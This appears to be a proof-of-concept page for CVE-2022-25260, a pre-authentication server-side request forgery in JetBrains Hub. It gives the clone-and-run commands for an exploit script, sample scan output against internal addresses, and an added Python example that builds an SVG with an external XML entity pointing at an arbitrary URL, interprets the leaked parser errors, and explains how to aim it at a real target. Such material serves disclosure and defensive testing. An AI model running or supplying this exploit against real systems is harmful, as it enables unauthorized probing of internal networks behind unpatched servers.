POC details: f0fa69151d664d1e2e429931f3cacb8e41cbd1d6

Source
Related vulnerability
Title: JetBrains Hub code issue vulnerability (CVE-2022-25260)
Description: JetBrains Hub is a web-based application from the Czech company JetBrains that integrates several JetBrains team tools. Versions of JetBrains Hub before 2021.1.14276 contain a code issue vulnerability: the software lacks validation against request forgery and is therefore susceptible to server-side request forgery (SSRF).
Description
PoC for CVE-2022-25260: pre-auth semi-blind SSRF in JetBrains Hub
Introduction
# CVE-2022-25260
JetBrains Hub pre-auth semi-blind server-side request forgery (SSRF)

## Requirements

- JetBrains Hub <2021.1.14276
- JetBrains Hub before 2021.1.14276 was also vulnerable to improper access control (CVE-2022-34894), which allows an attacker to create untrusted services without authentication even if the guest user is disabled. This makes it possible to exploit the SSRF without any other requirements (normally an attacker would need to be at least authenticated).

## Usage

Install & run:
```bash
$ git clone https://github.com/yuriisanin/CVE-2022-25260
$ cd CVE-2022-25260/
$ python3 exploit.py -h

|--------------------------------------------------------------------|
|       CVE-2022-25260 JetBrains Hub pre-auth semi-blind SSRF        |
|           developed by Yurii Sanin (Twitter: @SaninYurii)          |
|--------------------------------------------------------------------|
usage: exploit.py [-h] -hub_url HUB_URL -email EMAIL [-internal_urls_file INTERNAL_URLS_FILE] [-internal_url INTERNAL_URL]

optional arguments:
  -h, --help            show this help message and exit
  -hub_url HUB_URL      Target Hub instance
  -email EMAIL          Email address of any user in the system
  -internal_urls_file INTERNAL_URLS_FILE
                        Path to internal service URLs file
  -internal_url INTERNAL_URL
                        Internal service URL
  
```

Usage:

```bash
$ python3 exploit.py -hub_url http://localhost:8080 -email hello@0d.tf -internal_urls_file ./assets/payloads/urls.txt

|--------------------------------------------------------------------|
|       CVE-2022-25260 JetBrains Hub pre-auth semi-blind SSRF        |
|           developed by Yurii Sanin (Twitter: @SaninYurii)          |
|--------------------------------------------------------------------|
[INFO] - starting scanning for 14 urls.
[INFO] - trying to create Hub service.
[INFO] - Hub service created, serviceId: '02cc6043-1469-4a8e-9a74-b003e721620c'.
[INFO] - trying to request: 'http://127.0.0.1:8080'.
[INFO] - OK. Host 'http://127.0.0.1:8080' is running HTTP service (XML-like response) [FOUND]. Message: 'Attribute name "ng-strict-di" associated with an element type "html" must be followed by the ' = ' character.'.
[INFO] - trying to request: 'http://127.0.0.1:8081'.
[INFO] - OK. Host 'http://127.0.0.1:8081' is DOWN.
[INFO] - trying to request: 'http://google.com'.
[INFO] - OK. Host 'http://google.com' is running HTTP service (presumably XML-like response) [FOUND]. Message: 'The markup in the document preceding the root element must be well-formed.'.
```

**DEMO:**

![CVE-2022-25260 Demo](assets/images/cve-2022-25260.gif)

## How does it work?

The vulnerability was possible because Hub rasterized user-supplied SVG icons with Apache Batik in its default configuration, which lets the SVG parser fetch external resources. The response body is never returned to the attacker, only the XML parser's error message, which is why the SSRF is semi-blind: a parse error that quotes markup means the host answered with non-XML content, a connection error means it is down. You can find more information about exploiting server-side SVG rasterization [HERE](https://github.com/yuriisanin/svg2raster-cheatsheet).
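The mechanism above, as an added example that is not code from the original PoC repository or from JetBrains: it builds the kind of SVG "icon" that makes a default-configured Batik rasterizer fetch an attacker-chosen URL, and turns the parser error that leaks back into the host states printed in the exploit log (FOUND / DOWN). Two assumptions not stated on this page: the vector is an external XML entity resolved by Batik's Xerces-based parser, and the Hub upload step is represented by a caller-supplied `submit` function (the `fake_submit` stand-in replays constructed responses, two of them copied from the log lines above).

```python
"""Added example (not the PoC's own code): SVG SSRF probe + semi-blind classifier.

Assumptions: the SSRF vector is an external XML entity (Batik's default parser
resolves it); the real Hub upload is abstracted behind ``submit``.
"""
import re
from typing import Callable, Dict, Iterable, Optional
from urllib.parse import urlsplit


def build_svg_probe(target_url: str) -> str:
    """Return an SVG whose DTD declares an external entity pointing at target_url.

    A parser with external entities enabled fetches the URL when it expands
    &probe; and tries to parse the response body as XML. The body itself is
    never returned to the attacker; only the resulting parse error is.
    """
    parts = urlsplit(target_url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError(f"refusing non-http(s) target: {target_url!r}")
    if '"' in target_url:
        raise ValueError("a double quote would terminate the SYSTEM literal")
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE svg [<!ENTITY probe SYSTEM "{target_url}">]>\n'
        '<svg xmlns="http://www.w3.org/2000/svg" width="64" height="64">\n'
        '  <text x="0" y="32">&probe;</text>\n'
        '</svg>\n'
    )


# Xerces error texts meaning "the host answered and the body was not well-formed
# XML"; the first two are the ones visible in the exploit log above.
XML_PARSE_ERROR_MARKERS = (
    "must be followed by the ' = ' character",
    "preceding the root element must be well-formed",
    "content is not allowed in prolog",
    "must be terminated by the matching end-tag",
)
# Java connection-failure texts (constructed for this example; exact wording
# varies by JVM and OS).
DOWN_MARKERS = ("connection refused", "no route to host", "connect timed out")


def classify_response(error_message: Optional[str]) -> str:
    """Map the error text leaked by the rasterizer to a host state."""
    if error_message is None:
        # Rendered without error: the body was empty or well-formed XML.
        # Semi-blind means we cannot tell which, only that the fetch succeeded.
        return "NO_ERROR"
    text = error_message.lower()
    if any(marker in text for marker in DOWN_MARKERS):
        return "DOWN"
    if any(marker in text for marker in XML_PARSE_ERROR_MARKERS):
        return "FOUND"
    return "UNKNOWN"


def scan(urls: Iterable[str], submit: Callable[[str], Optional[str]]) -> Dict[str, str]:
    """Probe each URL once. ``submit`` uploads the SVG and returns the error
    message the server reported, or None if rasterization succeeded."""
    return {url: classify_response(submit(build_svg_probe(url))) for url in urls}


# --- offline stand-in for the Hub upload (constructed responses) -------------
_ENTITY_RE = re.compile(r'SYSTEM "([^"]+)"')
_CONSTRUCTED_RESPONSES = {
    # the two messages below are the ones shown in the exploit log above
    "http://127.0.0.1:8080": "Attribute name \"ng-strict-di\" associated with an element "
                             "type \"html\" must be followed by the ' = ' character.",
    "http://google.com": "The markup in the document preceding the root element must be well-formed.",
    # constructed: closed port, and a host that served well-formed XML
    "http://127.0.0.1:8081": "Connection refused (Connection refused)",
    "http://127.0.0.1:9000": None,
}


def fake_submit(svg: str) -> Optional[str]:
    """Simulates the server: returns the canned response for the probed URL."""
    target = _ENTITY_RE.search(svg).group(1)
    return _CONSTRUCTED_RESPONSES.get(target, "Internal error")


if __name__ == "__main__":
    for url, state in scan(list(_CONSTRUCTED_RESPONSES), fake_submit).items():
        print(f"{url}: {state}")
```

To run this against a real target, replace `fake_submit` with a function that creates the Hub service with the SVG as its icon and returns the error string the server reports; `build_svg_probe` deliberately refuses non-HTTP schemes so the probe stays a port-and-service check rather than a file read.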


## Support

You can follow me on [Twitter](https://twitter.com/SaninYurii), [GitHub](https://github.com/yuriisanin) or [YouTube](https://www.youtube.com/channel/UCLN2EvGxtnucEdrI21PmJZg).
File snapshot

```text
[4.0K] /data/pocs/f0fa69151d664d1e2e429931f3cacb8e41cbd1d6
├── [4.0K] assets
│   ├── [4.0K] images
│   │   └── [583K] cve-2022-25260.gif
│   └── [4.0K] payloads
│       └── [ 276] urls.txt
├── [8.3K] exploit.py
└── [3.1K] README.md

3 directories, 4 files
```